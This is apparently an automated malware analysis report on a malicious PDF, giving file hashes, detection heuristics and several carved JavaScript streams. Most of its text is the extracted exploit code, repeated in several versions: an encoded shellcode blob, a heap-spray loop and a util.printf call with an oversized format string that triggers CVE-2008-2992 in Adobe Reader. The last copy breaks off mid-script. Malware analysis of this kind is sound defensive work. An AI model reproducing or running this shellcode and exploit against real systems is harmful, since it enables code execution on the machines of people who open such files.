Malicious PDF — malware analysis report

Static analysis result for SHA-256 eec27edd3e23d511…

MALICIOUS

PDF

4.3 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 6e21e274830eada0e8b9007c79c5ee76 SHA-1: 6ce6c3fc30f18d4549d2636397bf5bf2fdb5fcd7 SHA-256: eec27edd3e23d5112c6aa8f611aca92cac690df63533bcc68c69023361cf6e7f
268 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including 'PDF_JAVASCRIPT' and 'PDF_JS'. The JavaScript stream, named 'javascript_obj0013_001.js', appears to be obfuscated, as suggested by the 'PDF_UNESCAPE' firing and the 'Script obfuscation indicators' in the static triage. The primary function of this script is likely to download and execute a second-stage payload, although the exact mechanism is obscured. The document body contains fragments that resemble JavaScript code and string concatenations, further supporting the malicious script execution.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 7

  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u1C13" +
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Malformed active-content stream length medium PDF_MALFORMED_EXPLOIT_STREAM_LENGTH
    A PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion/supporting evidence around Reader exploit streams.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Related samples 8

Ranked by shared artifacts, heuristics, extracted URLs, CVEs, and signatures.

Full JSON: related samples API

Extracted artifacts 6

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x3DC 2774 bytes
SHA-256: dd217d0fd6a6dbbd34e100b50bd16b8911297985e37580ee28525226e2a07a71
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u1C13" +
                         "%u5BF7%u834D%uFCEB%uF4E2%uE7F7%u0701%u3E2F%uF43D" +
                         "%uF620%u79DB%u6E16%uB7B9%uF2F7%uA6B3%u08E3%u3DA4" +
                         "%u6E50%uD4C2%u0ADF%uE463%u6E85%u5FC2%u62C5%uA449" +
                         "%uC399%u9449%uE58D%u5F1A%u52F6%uA049%u169B%u27C1" +
                         "%u100E%uD7E2%uE57E%uC08C%u83B6%u8394%uE5D4%uD7FD" +
                         "%uE57E%uBE30%u378B%u7231%u66F1%u8B9B%uA906%u91C6" +
                         "%u8767%u8B9B%uE5DB%u5F0F%u4AC3%u17C1%u8F54%u15C1" +
                         "%uA7B6%u5FA4%uE58D%uC884%uAD86%u3503%u6D87%u5F03" +
                         "%u6D85%u5F01%uE57F%u5735%u6043%u0449%u6AEF%u3C9B" +
                         "%u6ED5%uD4C2%uA806%u86CF%u91D3%u2895%uE5DF%uBE1A" +
                         "%u3784%uE92A%u6E85%u57C2%u7D43%u9294%u5005%uA142" +
                         "%uEE7F%u54F4%uEDDB%uF42E%uB20E%uF4A8%u91D6%u3895" +
                         "%u6A42%u88C1%u40E4%u13A7%u6DC1%uACC6%u6EE0%uE7C2" +
                         "%u3E45%u8792%u3ED3%u833D%uE579%u841E%u91D6%u2495" +
                         "%u91D5%u2095%uAEB6%u516E%u1B45%u853B%u38D7%u2B91" +
                         "%u3457%u7F9B%u8067%u14F1%u8646%u2BE4%u917A%uB185" +
                         "%u3EF1%uBBB0%u2FE6%uB0A6%u0BF7%uA7B1%u2985%uA0A7" +
                         "%u17D6%uA0B1%u03E0%uBD86%u0BF7%uA0A1%u1CEA%u95BB" +
                         "%u3985%uBAAB%u16C0%uB7A7%u2B85%uBDBA%u3AF1%uA6AA" +
                         "%u0FE0%uD4A6%u01C9%uB0A3%u07C9%uA6A0%u1CE4%u95BB" +
                         "%u1B85%uB8B0%u01E8%uD4AC%u3CD0%u908E%u19EA%uB8AC" +
                         "%u0FEA%u80A6%u28EA%uB8AB%u2FE0%u25C2%u8368%u772B" +
                         "%uD833%u3E32%u846C%u786B%u9432%u2034%u9133%u2132" +
                         "%uC479%u2875%u9264%u4DDB");
						 
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
javascript_obj0013_002.js pdf-javascript-stream PDF /JS object 13 at offset 0x402 3410 bytes
SHA-256: 276c72f2ea0276f9ad7fa9708a0044e5a735ea773c31f571d1a2252eac53712f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u1C13" +
                         "%u5BF7%u834D%uFCEB%uF4E2%uE7F7%u0701%u3E2F%uF43D" +
                         "%uF620%u79DB%u6E16%uB7B9%uF2F7%uA6B3%u08E3%u3DA4" +
                         "%u6E50%uD4C2%u0ADF%uE463%u6E85%u5FC2%u62C5%uA449" +
                         "%uC399%u9449%uE58D%u5F1A%u52F6%uA049%u169B%u27C1" +
                         "%u100E%uD7E2%uE57E%uC08C%u83B6%u8394%uE5D4%uD7FD" +
                         "%uE57E%uBE30%u378B%u7231%u66F1%u8B9B%uA906%u91C6" +
                         "%u8767%u8B9B%uE5DB%u5F0F%u4AC3%u17C1%u8F54%u15C1" +
                         "%uA7B6%u5FA4%uE58D%uC884%uAD86%u3503%u6D87%u5F03" +
                         "%u6D85%u5F01%uE57F%u5735%u6043%u0449%u6AEF%u3C9B" +
                         "%u6ED5%uD4C2%uA806%u86CF%u91D3%u2895%uE5DF%uBE1A" +
                         "%u3784%uE92A%u6E85%u57C2%u7D43%u9294%u5005%uA142" +
                         "%uEE7F%u54F4%uEDDB%uF42E%uB20E%uF4A8%u91D6%u3895" +
                         "%u6A42%u88C1%u40E4%u13A7%u6DC1%uACC6%u6EE0%uE7C2" +
                         "%u3E45%u8792%u3ED3%u833D%uE579%u841E%u91D6%u2495" +
                         "%u91D5%u2095%uAEB6%u516E%u1B45%u853B%u38D7%u2B91" +
                         "%u3457%u7F9B%u8067%u14F1%u8646%u2BE4%u917A%uB185" +
                         "%u3EF1%uBBB0%u2FE6%uB0A6%u0BF7%uA7B1%u2985%uA0A7" +
                         "%u17D6%uA0B1%u03E0%uBD86%u0BF7%uA0A1%u1CEA%u95BB" +
                         "%u3985%uBAAB%u16C0%uB7A7%u2B85%uBDBA%u3AF1%uA6AA" +
                         "%u0FE0%uD4A6%u01C9%uB0A3%u07C9%uA6A0%u1CE4%u95BB" +
                         "%u1B85%uB8B0%u01E8%uD4AC%u3CD0%u908E%u19EA%uB8AC" +
                         "%u0FEA%u80A6%u28EA%uB8AB%u2FE0%u25C2%u8368%u772B" +
                         "%uD833%u3E32%u846C%u786B%u9432%u2034%u9133%u2132" +
                         "%uC479%u2875%u9264%u4DDB");
						 
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f 
0000000015 00000 n 
0000000264 00000 n 
0000000282 00000 n 
0000000327 00000 n 
0000000400 00000 n 
0000000431 00000 n 
0000000451 00000 n 
0000000490 00000 n 
0000000556 00000 n 
0000000734 00000 n 
0000000784 00000 n 
0000000865 00000 n 
0000000912 00000 n 
0000006893 00000 n 
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
generic_stage_recovery_000.js deobfuscated-js generic stage recovery split-literal-normalize from JavaScript object 13 at offset 0x3DC 2021 bytes
SHA-256: 7f2f8191caf23a9e743b37b2f8198b1ead7dc975023452f2224048be55403519
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u1C13%u5BF7%u834D%uFCEB%uF4E2%uE7F7%u0701%u3E2F%uF43D%uF620%u79DB%u6E16%uB7B9%uF2F7%uA6B3%u08E3%u3DA4%u6E50%uD4C2%u0ADF%uE463%u6E85%u5FC2%u62C5%uA449%uC399%u9449%uE58D%u5F1A%u52F6%uA049%u169B%u27C1%u100E%uD7E2%uE57E%uC08C%u83B6%u8394%uE5D4%uD7FD%uE57E%uBE30%u378B%u7231%u66F1%u8B9B%uA906%u91C6%u8767%u8B9B%uE5DB%u5F0F%u4AC3%u17C1%u8F54%u15C1%uA7B6%u5FA4%uE58D%uC884%uAD86%u3503%u6D87%u5F03%u6D85%u5F01%uE57F%u5735%u6043%u0449%u6AEF%u3C9B%u6ED5%uD4C2%uA806%u86CF%u91D3%u2895%uE5DF%uBE1A%u3784%uE92A%u6E85%u57C2%u7D43%u9294%u5005%uA142%uEE7F%u54F4%uEDDB%uF42E%uB20E%uF4A8%u91D6%u3895%u6A42%u88C1%u40E4%u13A7%u6DC1%uACC6%u6EE0%uE7C2%u3E45%u8792%u3ED3%u833D%uE579%u841E%u91D6%u2495%u91D5%u2095%uAEB6%u516E%u1B45%u853B%u38D7%u2B91%u3457%u7F9B%u8067%u14F1%u8646%u2BE4%u917A%uB185%u3EF1%uBBB0%u2FE6%uB0A6%u0BF7%uA7B1%u2985%uA0A7%u17D6%uA0B1%u03E0%uBD86%u0BF7%uA0A1%u1CEA%u95BB%u3985%uBAAB%u16C0%uB7A7%u2B85%uBDBA%u3AF1%uA6AA%u0FE0%uD4A6%u01C9%uB0A3%u07C9%uA6A0%u1CE4%u95BB%u1B85%uB8B0%u01E8%uD4AC%u3CD0%u908E%u19EA%uB8AC%u0FEA%u80A6%u28EA%uB8AB%u2FE0%u25C2%u8368%u772B%uD833%u3E32%u846C%u786B%u9432%u2034%u9133%u2132%uC479%u2875%u9264%u4DDB");
						 
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
generic_stage_recovery_001.js deobfuscated-js generic stage recovery split-literal-normalize from JavaScript object 13 at offset 0x402 2657 bytes
SHA-256: 3085edd5a8c34867d8e1b099b79d06daa44eed19295062e5f224abbe4c1316f5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u1C13%u5BF7%u834D%uFCEB%uF4E2%uE7F7%u0701%u3E2F%uF43D%uF620%u79DB%u6E16%uB7B9%uF2F7%uA6B3%u08E3%u3DA4%u6E50%uD4C2%u0ADF%uE463%u6E85%u5FC2%u62C5%uA449%uC399%u9449%uE58D%u5F1A%u52F6%uA049%u169B%u27C1%u100E%uD7E2%uE57E%uC08C%u83B6%u8394%uE5D4%uD7FD%uE57E%uBE30%u378B%u7231%u66F1%u8B9B%uA906%u91C6%u8767%u8B9B%uE5DB%u5F0F%u4AC3%u17C1%u8F54%u15C1%uA7B6%u5FA4%uE58D%uC884%uAD86%u3503%u6D87%u5F03%u6D85%u5F01%uE57F%u5735%u6043%u0449%u6AEF%u3C9B%u6ED5%uD4C2%uA806%u86CF%u91D3%u2895%uE5DF%uBE1A%u3784%uE92A%u6E85%u57C2%u7D43%u9294%u5005%uA142%uEE7F%u54F4%uEDDB%uF42E%uB20E%uF4A8%u91D6%u3895%u6A42%u88C1%u40E4%u13A7%u6DC1%uACC6%u6EE0%uE7C2%u3E45%u8792%u3ED3%u833D%uE579%u841E%u91D6%u2495%u91D5%u2095%uAEB6%u516E%u1B45%u853B%u38D7%u2B91%u3457%u7F9B%u8067%u14F1%u8646%u2BE4%u917A%uB185%u3EF1%uBBB0%u2FE6%uB0A6%u0BF7%uA7B1%u2985%uA0A7%u17D6%uA0B1%u03E0%uBD86%u0BF7%uA0A1%u1CEA%u95BB%u3985%uBAAB%u16C0%uB7A7%u2B85%uBDBA%u3AF1%uA6AA%u0FE0%uD4A6%u01C9%uB0A3%u07C9%uA6A0%u1CE4%u95BB%u1B85%uB8B0%u01E8%uD4AC%u3CD0%u908E%u19EA%uB8AC%u0FEA%u80A6%u28EA%uB8AB%u2FE0%u25C2%u8368%u772B%uD833%u3E32%u846C%u786B%u9432%u2034%u9133%u2132%uC479%u2875%u9264%u4DDB");
						 
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f 
0000000015 00000 n 
0000000264 00000 n 
0000000282 00000 n 
0000000327 00000 n 
0000000400 00000 n 
0000000431 00000 n 
0000000451 00000 n 
0000000490 00000 n 
0000000556 00000 n 
0000000734 00000 n 
0000000784 00000 n 
0000000865 00000 n 
0000000912 00000 n 
0000006893 00000 n 
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
generic_stage_recovery_002.js deobfuscated-js generic stage recovery split-literal-normalize from combined JavaScript objects at offset 0x11 4699 bytes
SHA-256: 63bd64885d858b5081c774faa46257cf4d6b3742164927fada5abcc7a123ac17
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
this.lhF0pCJES29x()
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u1C13%u5BF7%u834D%uFCEB%uF4E2%uE7F7%u0701%u3E2F%uF43D%uF620%u79DB%u6E16%uB7B9%uF2F7%uA6B3%u08E3%u3DA4%u6E50%uD4C2%u0ADF%uE463%u6E85%u5FC2%u62C5%uA449%uC399%u9449%uE58D%u5F1A%u52F6%uA049%u169B%u27C1%u100E%uD7E2%uE57E%uC08C%u83B6%u8394%uE5D4%uD7FD%uE57E%uBE30%u378B%u7231%u66F1%u8B9B%uA906%u91C6%u8767%u8B9B%uE5DB%u5F0F%u4AC3%u17C1%u8F54%u15C1%uA7B6%u5FA4%uE58D%uC884%uAD86%u3503%u6D87%u5F03%u6D85%u5F01%uE57F%u5735%u6043%u0449%u6AEF%u3C9B%u6ED5%uD4C2%uA806%u86CF%u91D3%u2895%uE5DF%uBE1A%u3784%uE92A%u6E85%u57C2%u7D43%u9294%u5005%uA142%uEE7F%u54F4%uEDDB%uF42E%uB20E%uF4A8%u91D6%u3895%u6A42%u88C1%u40E4%u13A7%u6DC1%uACC6%u6EE0%uE7C2%u3E45%u8792%u3ED3%u833D%uE579%u841E%u91D6%u2495%u91D5%u2095%uAEB6%u516E%u1B45%u853B%u38D7%u2B91%u3457%u7F9B%u8067%u14F1%u8646%u2BE4%u917A%uB185%u3EF1%uBBB0%u2FE6%uB0A6%u0BF7%uA7B1%u2985%uA0A7%u17D6%uA0B1%u03E0%uBD86%u0BF7%uA0A1%u1CEA%u95BB%u3985%uBAAB%u16C0%uB7A7%u2B85%uBDBA%u3AF1%uA6AA%u0FE0%uD4A6%u01C9%uB0A3%u07C9%uA6A0%u1CE4%u95BB%u1B85%uB8B0%u01E8%uD4AC%u3CD0%u908E%u19EA%uB8AC%u0FEA%u80A6%u28EA%uB8AB%u2FE0%u25C2%u8368%u772B%uD833%u3E32%u846C%u786B%u9432%u2034%u9133%u2132%uC479%u2875%u9264%u4DDB");
						 
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u1C13%u5BF7%u834D%uFCEB%uF4E2%uE7F7%u0701%u3E2F%uF43D%uF620%u79DB%u6E16%uB7B9%uF2F7%uA6B3%u08E3%u3DA4%u6E50%uD4C2%u0ADF%uE463%u6E85%u5FC2%u62C5%uA449%uC399%u9449%uE58D%u5F1A%u52F6%uA049%u169B%u27C1%u100E%uD7E2%uE57E%uC08C%u83B6%u8394%uE5D4%uD7FD%uE57E%uBE30%u378B%u7231%u66F1%u8B9B%uA906%u91C6%u8767%u8B9B%uE5DB%u5F0F%u4AC3%u17C1%u8F54%u15C1%uA7B6%u5FA4%uE58D%uC884%uAD86%u3503%u6D87%u5F03%u6D85%u5F01%uE57F%u5735%u6043%u0449%u6AEF%u3C9B%u6ED5%uD4C2%uA806%u86CF%u91D3%u2895%uE5DF%uBE1A%u3784%uE92A%u6E85%u57C2%u7D43%u9294%u5005%uA142%uEE7F%u54F4%uEDDB%uF42E%uB20E%uF4A8%u91D6%u3895%u6A42%u88C1%u40E4%u13A7%u6DC1%uACC6%u6EE0%uE7C2%u3E45%u8792%u3ED3%u833D%uE579%u841E%u91D6%u2495%u91D5%u2095%uAEB6%u516E%u1B45%u853B%u38D7%u2B91%u3457%u7F9B%u8067%u14F1%u8646%u2BE4%u917A%uB185%u3EF1%uBBB0%u2FE6%uB0A6%u0BF7%uA7B1%u2985%uA0A7%u17D6%uA0B1%u03E0%uBD86%u0BF7%uA0A1%u1CEA%u95BB%u3985%uBAAB%u16C0%uB7A7%u2B85%uBDBA%u3AF1%uA6AA%u0FE0%uD4A6%u01C9%uB0A3%u07C9%uA6A0%u1CE4%u95BB%u1B85%uB8B0%u01E8%uD4AC%u3CD0%u908E%u19EA%uB8AC%u0FEA%u80A6%u28EA%uB8AB%u2FE0%u25C2%u8368%u772B%uD833%u3E32%u846C%u786B%u9432%u2034%u9133%u2132%uC479%u2875%u9264%u4DDB");
						 
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f 
0000000015 00000 n 
0000000264 00000 n 
0000000282 00000 n 
0000000327 00000 n 
0000000400 00000 n 
0000000431 00000 n 
0000000451 00000 n 
0000000490 00000 n 
0000000556 00000 n 
0000000734 00000 n 
0000000784 00000 n 
0000000865 00000 n 
0000000912 00000 n 
0000006893 00000 n 
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
combined_document_js_000.js deobfuscated-js combined document JavaScript streams at offset 0x11 6205 bytes
SHA-256: 9947b3d43b6edfae902dcd579f1656d881ceea832c946dd09f71007bd2ea167f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
this.lhF0pCJES29x()
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u1C13" +
                         "%u5BF7%u834D%uFCEB%uF4E2%uE7F7%u0701%u3E2F%uF43D" +
                         "%uF620%u79DB%u6E16%uB7B9%uF2F7%uA6B3%u08E3%u3DA4" +
                         "%u6E50%uD4C2%u0ADF%uE463%u6E85%u5FC2%u62C5%uA449" +
                         "%uC399%u9449%uE58D%u5F1A%u52F6%uA049%u169B%u27C1" +
                         "%u100E%uD7E2%uE57E%uC08C%u83B6%u8394%uE5D4%uD7FD" +
                         "%uE57E%uBE30%u378B%u7231%u66F1%u8B9B%uA906%u91C6" +
                         "%u8767%u8B9B%uE5DB%u5F0F%u4AC3%u17C1%u8F54%u15C1" +
                         "%uA7B6%u5FA4%uE58D%uC884%uAD86%u3503%u6D87%u5F03" +
                         "%u6D85%u5F01%uE57F%u5735%u6043%u0449%u6AEF%u3C9B" +
                         "%u6ED5%uD4C2%uA806%u86CF%u91D3%u2895%uE5DF%uBE1A" +
                         "%u3784%uE92A%u6E85%u57C2%u7D43%u9294%u5005%uA142" +
                         "%uEE7F%u54F4%uEDDB%uF42E%uB20E%uF4A8%u91D6%u3895" +
                         "%u6A42%u88C1%u40E4%u13A7%u6DC1%uACC6%u6EE0%uE7C2" +
                         "%u3E45%u8792%u3ED3%u833D%uE579%u841E%u91D6%u2495" +
                         "%u91D5%u2095%uAEB6%u516E%u1B45%u853B%u38D7%u2B91" +
                         "%u3457%u7F9B%u8067%u14F1%u8646%u2BE4%u917A%uB185" +
                         "%u3EF1%uBBB0%u2FE6%uB0A6%u0BF7%uA7B1%u2985%uA0A7" +
                         "%u17D6%uA0B1%u03E0%uBD86%u0BF7%uA0A1%u1CEA%u95BB" +
                         "%u3985%uBAAB%u16C0%uB7A7%u2B85%uBDBA%u3AF1%uA6AA" +
                         "%u0FE0%uD4A6%u01C9%uB0A3%u07C9%uA6A0%u1CE4%u95BB" +
                         "%u1B85%uB8B0%u01E8%uD4AC%u3CD0%u908E%u19EA%uB8AC" +
                         "%u0FEA%u80A6%u28EA%uB8AB%u2FE0%u25C2%u8368%u772B" +
                         "%uD833%u3E32%u846C%u786B%u9432%u2034%u9133%u2132" +
                         "%uC479%u2875%u9264%u4DDB");
						 
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u1C13" +
                         "%u5BF7%u834D%uFCEB%uF4E2%uE7F7%u0701%u3E2F%uF43D" +
                         "%uF620%u79DB%u6E16%uB7B9%uF2F7%uA6B3%u08E3%u3DA4" +
                         "%u6E50%uD4C2%u0ADF%uE463%u6E85%u5FC2%u62C5%uA449" +
